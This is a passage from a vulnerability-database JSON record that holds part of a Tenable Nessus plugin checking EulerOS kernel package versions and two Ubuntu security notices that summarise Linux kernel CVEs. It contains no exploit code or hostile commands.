add_key systemcall and KEYCTL_UPDATE\n operations allowed for a NULL payload with a nonzero\n length. When accessing the payload within this length\n parameters value, an unprivileged user could trivially\n cause a NULL pointer dereference (kernel\n oops).(CVE-2017-15274i1/4%0\n\n - A flaw was found in the Linux kernel's keyring handling\n code: the key_reject_and_link() function could be\n forced to free an arbitrary memory block. 
An attacker\n could use this flaw to trigger a use-after-free\n condition on the system, potentially allowing for\n privilege escalation.(CVE-2016-4470i1/4%0\n\n - A flaw was found in the way certain interfaces of the\n Linux kernel's Infiniband subsystem used write() as\n bi-directional ioctl() replacement, which could lead to\n insufficient memory security checks when being invoked\n using the splice() system call. A local unprivileged\n user on a system with either Infiniband hardware\n present or RDMA Userspace Connection Manager Access\n module explicitly loaded, could use this flaw to\n escalate their privileges on the\n system.(CVE-2016-4565i1/4%0\n\n - It was found that the Linux kernel's IPv6 network stack\n did not properly validate the value of the MTU variable\n when it was set. A remote attacker could potentially\n use this flaw to disrupt a target system's networking\n (packet loss) by setting an invalid MTU value, for\n example, via a NetworkManager daemon that is processing\n router advertisement packets running on the target\n system.(CVE-2015-8215i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1532\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf9dd973\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BPF Sign Extension Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg 
in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:38:10", "bulletinFamily": "unix", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "description": "Mathias Payer and Hui Peng discovered a use-after-free vulnerability in the \nAdvanced Linux Sound Architecture (ALSA) subsystem. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information \nleak in the Bluetooth implementation of the Linux kernel. An attacker \nwithin Bluetooth range could use this to expose sensitive information \n(kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel \ncontained a use-after-free vulnerability. An attacker in a guest VM with \naccess to /dev/kvm could use this to cause a denial of service (guest VM \ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in \nthe KVM subsystem of the Linux kernel, when using nested virtual machines. \nA local attacker in a guest VM could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code in the host system. \n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in \nthe KVM subsystem of the Linux kernel, when nested virtualization is used. 
\nA local attacker could use this to expose sensitive information (host \nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was \ninsufficiently hardened against Spectre V1 attacks. A local attacker could \nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user- \nspace API for crypto (af_alg) implementation in the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory \nwhen handling certain errors while reading files. A local attacker could \nuse this to cause a denial of service (excessive memory consumption). \n(CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the IPMI \nimplementation in the Linux kernel. A local attacker with access to the \nIPMI character device files could use this to cause a denial of service \n(system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux kernel \nperformed insufficient ASN.1 length checks. An attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel did \nnot properly check for the mmap minimum address in some situations. A local \nattacker could use this to assist exploiting a kernel NULL pointer \ndereference vulnerability. 
(CVE-2019-9213)", "edition": 3, "modified": "2019-04-02T00:00:00", "published": "2019-04-02T00:00:00", "id": "USN-3930-1", "href": "https://ubuntu.com/security/notices/USN-3930-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:35:59", "bulletinFamily": "unix", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "description": "USN-3930-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.10. \nThis update provides the corresponding updates for the Linux Hardware \nEnablement (HWE) kernel from Ubuntu 18.10 for Ubuntu 18.04 LTS.\n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability in the \nAdvanced Linux Sound Architecture (ALSA) subsystem. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information \nleak in the Bluetooth implementation of the Linux kernel. An attacker \nwithin Bluetooth range could use this to expose sensitive information \n(kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel \ncontained a use-after-free vulnerability. An attacker in a guest VM with \naccess to /dev/kvm could use this to cause a denial of service (guest VM \ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in \nthe KVM subsystem of the Linux kernel, when using nested virtual machines. \nA local attacker in a guest VM could use this to cause a denial of service \n(system crash) or possibly execute arbitrary code in the host system. 
\n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in \nthe KVM subsystem of the Linux kernel, when nested virtualization is used. \nA local attacker could use this to expose sensitive information (host \nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was \ninsufficiently hardened against Spectre V1 attacks. A local attacker could \nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user- \nspace API for crypto (af_alg) implementation in the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory \nwhen handling certain errors while reading files. A local attacker could \nuse this to cause a denial of service (excessive memory consumption). \n(CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the IPMI \nimplementation in the Linux kernel. A local attacker with access to the \nIPMI character device files could use this to cause a denial of service \n(system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux kernel \nperformed insufficient ASN.1 length checks. An attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2019-9162)\n\nJann Horn discovered that the mmap implementation in the Linux kernel did \nnot properly check for the mmap minimum address in some situations. 
A local \nattacker could use this to assist exploiting a kernel NULL pointer \ndereference vulnerability. (CVE-2019-9213)", "edition": 3, "modified": "2019-04-02T00:00:00", "published": "2019-04-02T00:00:00", "id": "USN-3930-2", "href": "https://ubuntu.com/security/notices/USN-3930-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}